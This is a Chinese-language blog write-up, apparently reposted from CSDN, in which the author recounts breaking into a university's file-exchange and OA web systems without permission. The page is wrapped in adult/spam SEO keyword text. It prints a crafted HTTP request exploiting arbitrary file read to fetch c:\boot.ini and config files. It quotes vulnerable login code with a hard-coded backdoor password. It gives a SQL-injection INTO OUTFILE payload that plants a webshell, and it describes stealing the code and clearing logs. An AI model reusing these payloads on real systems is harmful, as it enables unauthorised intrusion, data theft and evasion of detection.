成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

記一次前所未有巧妙的Hacking入侵

安全 黑客攻防
此次安全檢測過去有段時間了,一直想寫成稿子就是沒有時間,具體環(huán)境可能有所淡忘,但整個過程和思路還是很明了的。由于在校期間課余在學校的網(wǎng)絡工作室工 作,所以對一些學校網(wǎng)站的服務和發(fā)展比較關注。這期間發(fā)現(xiàn)某學院的文件交換系統(tǒng)非常的不錯,在校園網(wǎng)內使用會帶來很多方面的便捷。搜索了下網(wǎng)上沒有現(xiàn)成的 系統(tǒng)下載,難道非要自己現(xiàn)寫不成…

此次安全檢測過去有段時間了,一直想寫成稿子就是沒有時間,具體環(huán)境可能有所淡忘,但整個過程和思路還是很明了的。由于在校期間課余在學校的網(wǎng)絡工作室工 作,所以對一些學校網(wǎng)站的服務和發(fā)展比較關注。這期間發(fā)現(xiàn)某學院的文件交換系統(tǒng)非常的不錯,在校園網(wǎng)內使用會帶來很多方面的便捷。搜索了下網(wǎng)上沒有現(xiàn)成的 系統(tǒng)下載,難道非要自己現(xiàn)寫不成…

踩點:

服務器開放了21和80端口,Serv-U6.2、 Apache/2.055(win32)PHP/5.1.2;同臺服務器上還有一個OA系統(tǒng)。黑盒測試,先是測試上傳腳本文件,可以上傳,得到提取碼后進 行提取不會被解析…,對上傳過程進行抓包,然后構造不存在的文件,發(fā)包,也沒有暴出任何敏感信息。對整個的交換系統(tǒng)進行文件掃描也就掃出個 config.php,google了下也沒有別的文件。剛才不是說還有個OA 系統(tǒng)嗎,google OA的時候確實有動態(tài)的連接,但所有的連接首先判斷是不是校內IP,如果非校內IP直接跳轉一個登陸頁面,到這里測試完全的陷入了僵局。幾經(jīng)的離開,幾經(jīng) 的回來再測試都沒有結果,難道真的拿不下它嗎?再一次的測試時輸入提取碼后的下載地址吸引了我。

“hxxp://www.xxx.edu.cn/ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg”

url后應該是個絕對地址,那么修改下會不會下到別的文件?
抓包:

GET /ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg
HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
一般WIN32下PHP繼承的SYS權限,所以讀文件干脆就讀c:\boot.ini,Telnet 服務器ip 80發(fā)送下面修改好的數(shù)據(jù)

修改:

/ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0

結果真的返回了boot.ini的內容,狂喜中!

緊接著下來的問題就是猜web目錄的路徑了,找PHP或者Apache的配置文件應該都能找到WEB的路徑,還是上面的發(fā)包,當試到路徑 d:\wwwroot\ex時,沒有返回錯誤信息,說明猜對了他的路徑,然后就是讀交換系統(tǒng)的文件代碼了,代碼都是相關聯(lián)的,發(fā)現(xiàn)就7個php文件而且用 這個系統(tǒng)根本拿不到shell。進而轉攻OA系統(tǒng),不出意外OA的路徑應該就是d:\wwwroot\oa,完全正確!首先讀的就是 config.php,察看敏感信息,暴出數(shù)據(jù)庫聯(lián)接信息是本地連接,root權限。然后就是掃描OA文件,測試到這程度能不能拿shell我心里還是沒 有底,大批的讀源文件?… …心里發(fā)寒。

突破:

自己陷入矛盾中,放棄吧不甘心;繼續(xù)吧,就算讀完整套代碼可能一無所獲。心一橫,先看看有沒有代碼過濾再說吧,首先登陸口,隨意輸入用戶名、密碼提交,抓包。抓到check.php,然后讀代碼。它是這么寫的:

//echo "系統(tǒng)維護,請稍后訪問!";exit;
require("config.php");
require("public/f_main.php");
require("f_db/".$Database['type'].".php");

session_start();

$db = new sql_db($Database['server'], $Database['username'], $Database['password'], $Database['dbname'], false);
if(!$db -> db_connect_id)
{
MsgGo("數(shù)據(jù)庫連接失敗!","exit");
}

foreach($_POST as $key=>$value) $$key=$value;

//用戶密碼驗證
$sql="SELECT a.*,b.dep_name,b.dep_parent_id,b.dep_id AS dep_id,c.dep_name as dep_parent_name
FROM t_user a
LEFT JOIN t_dep b ON a.dep_id = b.dep_id
LEFT JOIN t_dep c ON c.dep_id = b.dep_parent_id
WHERE user_name ='$user_name'";
if(!($result = $db->sql_query($sql))) MsgGo("數(shù)據(jù)查詢失敗!","login.php");
if($row = $db->sql_fetchrow($result)){
if($row["user_status"]!="1"){
MsgGo("該用戶處于停用狀態(tài),暫不能登錄!","login.php");
}else{
if(md5($user_password)==$row["user_password"] || crypt($user_password,$row["user_password_old"])==$row["user_password_old"] || $user_password=="qwert12345")
{
if($row["user_password_old"]!="" && $user_password!="qwert12345"){
$sql="UPDATE t_user SET
user_password='".md5($user_password)."',
user_password_old=''
WHERE user_name ='$user_name'";
if(!$result = $db->sql_query($sql)){
MsgGo("數(shù)據(jù)查詢失敗!","login.php");
}
}
$sql="UPDATE t_user SET
last_login_time=".time()."
WHERE user_name ='$user_name'";
if(!$result = $db->sql_query($sql)){
MsgGo("數(shù)據(jù)查詢失敗!","login.php");
}
$_SESSION["sess_user_name"]=$row["user_name"];
$_SESSION["sess_user_type"]=$row["user_type"];
$_SESSION["sess_user_real_name"]=$row["user_real_name"];
$_SESSION["sess_user_level"]=$row["user_level"];
$_SESSION["sess_dep_id"]=$row["dep_id"];
$_SESSION["sess_dep_name"]=$row["dep_name"];

if($row["dep_parent_id"]=="1"){
$_SESSION["sess_dep_level"]="1";
$_SESSION["sess_dep_id1"]=$row["dep_id"];
$_SESSION["sess_dep_parent_id"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_name"]=$row["dep_parent_name"];
}elseif($row["dep_parent_id"]>"1"){
$_SESSION["sess_dep_level"]="2";
$_SESSION["sess_dep_id1"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_id"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_name"]=$row["dep_parent_name"];
}

WriteLog("登錄系統(tǒng)");

//writeCookie("username_recent",$_SESSION["sess_user_name"],24*30);
setcookie("username_recent",$_SESSION["sess_user_name"], time()+3600*24*30);

//進入系統(tǒng)主頁面
echo " ";
}else{
MsgGo("密碼錯誤!","login.php");
}
}
}else{
MsgGo("用戶名錯誤!","login.php");
}

?>

可以看出check.php過濾非常的不嚴,直接導致SQL注入!貌似網(wǎng)上有不少類似的文章。先查出有24個字段,然后
'union select 1,'',3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 into outfile 'd:\wwwroot\oa\dir.php'/*
提交!

這樣hxxp://www.xxx.edu.cn/oa/dir.php 就是我們的shell地址了。

這個shell都不用提權… …直接把文件交換還有OA打包拖回家,也沒有搞別的,擦擦日志走人了。

整個過程算是峰回路轉啊,那個艱辛啊,知道這樣還不如自己寫,托回來個有洞的程序-_-,唉。仔細讀了下代碼,問題出在download.php上,就寫錯 了一個函數(shù)… …看來還真驗證了那句話“安全來不得半點馬虎!”我目的就是拿這個程序,沒有再做進一步的滲透,有了小的缺口可能導致整個服務器群的淪陷!安全無小事!

【編輯推薦】

  1. WEB / FTP服務器入侵
  2. One-way Web Hacking
責任編輯:Oo小孩兒 來源: CSDN
相關推薦

2012-06-12 10:30:41

2020-04-15 11:07:34

存儲閃存技術

2022-07-28 10:08:32

物聯(lián)網(wǎng)航空業(yè)

2021-01-08 15:07:02

光子處理器計算密度AI

2012-10-29 13:06:57

蘋果一體機

2022-01-11 10:05:27

加密貨幣比特幣貨幣

2023-10-08 07:01:55

大數(shù)據(jù)ERP供應鏈

2021-10-28 11:02:35

比特幣加密貨幣貨幣

2011-10-03 21:41:48

蘋果iPhone 5需求

2020-04-06 14:09:36

存儲閃存技術

2018-07-09 17:37:08

區(qū)塊鏈

2017-07-14 10:28:16

2021-04-06 05:57:47

Windows10操作系統(tǒng)微軟

2019-06-13 15:00:35

2010-02-12 09:36:29

2021-04-03 12:45:03

人工智能遠程醫(yī)療疫情

2022-09-14 12:01:35

服務器入侵篡改,

2017-08-10 15:20:35

大數(shù)據(jù)數(shù)據(jù)安全用戶數(shù)據(jù)

2019-08-01 15:05:22

2018-05-04 17:05:52

魅藍
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 天堂久久网 | www.久久久久久久久久久久 | 黄免费在线 | 91大神在线资源观看无广告 | 国产精品乱码一区二区三区 | 福利色导航 | 九九热热九九 | 国产日本精品视频 | 91精品国产色综合久久不卡98口 | 国产伦精品一区二区三区在线 | 精产国产伦理一二三区 | av电影一区二区 | 亚洲精彩视频在线观看 | 欧美精品久久 | 久久精品91久久久久久再现 | 亚洲网在线 | 亚洲伊人久久综合 | 精品一区二区三区四区在线 | 亚洲国产日韩欧美 | 成人h视频在线 | 综合久久综合久久 | 天堂网中文字幕在线观看 | 国内成人免费视频 | 亚洲精品中文字幕 | 美女黄18岁以下禁止观看 | 狠狠亚洲 | 夜夜草视频 | 国产精品久久久久久福利一牛影视 | 99精品久久久 | 久久lu | 欧美激情一区二区 | 天天精品综合 | 国产精品18hdxxxⅹ在线 | 国产专区在线 | 日本又色又爽又黄的大片 | 手机av在线 | 久久国产婷婷国产香蕉 | 毛片一级电影 | 蜜臀网 | 久久夜夜 | 久久久久中文字幕 |